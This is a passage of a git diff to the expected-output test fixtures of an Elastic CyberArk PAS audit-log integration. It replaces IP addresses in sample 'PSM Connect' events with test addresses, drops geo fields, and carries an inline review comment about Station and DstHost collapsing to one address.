\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331210700Z", + "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", 
@@ -2026,39 +1774,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2075,7 +1802,7 @@ }, "@timestamp": "2021-03-16T10:04:51.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -2086,16 +1813,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-16T10:04:51Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating 
System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"4\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615888216\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Connect", "issuer": "Administrator", "extra_details": { @@ -2107,15 +1833,15 @@ "application_type": "PSMP-SSH", "psmid": "PSMServer", "session_id": "8b222ac9-c2ad-49ea-9c4e-6829940f58d4", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115" + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15" }, "rfc5424": true, "ca_properties": { "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -2128,9 +1854,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615888216" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "PSM Connect", "timestamp": "Mar 16 03:04:51", "desc": "PSM Connect" 
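Review bot: `related.ip` shrinks from three addresses to two because the replacement reuses 67.43.156.15 for both Station and DstHost (here, and `cyberarkpas.audit.station` in hunk @@ -2128), so the fixture can no longer tell whether the pipeline mapped `Station` to `destination.ip` or to its own field. The original sample kept Station, DstHost and SrcHost distinct, and that distinction is what would catch a field-mapping regression. Giving Station a third unused address from the same supported subset (constructed example: `67.43.156.14`) and regenerating would keep `related.ip` at three entries. The same collapse likely affects the corresponding test input log and the other events of this expected file.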
@@ -2141,8 +1867,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936307800Z", - "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331215300Z", + "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"4\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615888216\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 16 03:04:51\",\"IsoTimestamp\":\"2021-03-16T10:04:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating 
System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"4\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615888216\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log index c172f644c9f..06567eb4180 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-302-psm-disconnect.log 
